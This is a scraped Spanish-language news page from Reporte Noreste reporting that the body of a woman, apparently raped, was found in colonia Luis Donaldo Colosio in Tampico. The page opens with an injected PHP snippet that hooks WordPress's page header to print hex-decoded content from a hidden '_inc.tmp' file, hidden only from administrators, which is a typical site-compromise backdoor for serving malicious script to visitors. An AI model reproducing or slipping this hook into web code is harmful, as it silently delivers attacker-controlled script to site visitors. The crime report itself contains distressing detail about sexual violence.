if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Encuentran cuerpo sin vida de una mujer en la col. Luis Donaldo Colosio – Reporte Noreste
Conéctate con nosotros

Tampico Tamps.- El cuerpo sin vida de una mujer de entre 40 y 50 años de edad, fue encontrado en un paraje de la colonia Luis Donaldo Colosio, trascendiendo que presenta huellas de haber sido víctima de violación.

El lamentable hecho se registró a las 17:00 horas, cuando una persona se comunicó a la Central de Emergencias reportando el hallazgo en una brecha del mencionado sector en los límites de Tampico y Altamira.

Autoridades se trasladaron al sitio, en donde efectivamente encontraron el cuerpo sin vida y en estado de descomposición, de una persona del sexo femenino, de entre 40 y 50 años de edad, quien se encontraba semidesnuda y presentaba huellas de haber sido violada.

El Agente Tercero del Ministerio Público Investigador  Licenciado Ernesto Méndez, acudió a dar fe de los hechos, y ordenó el traslado del cuerpo a las instalaciones de SEMEFO en espera de que alguien acuda a identificarla.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Más en Sur de Tamaulipas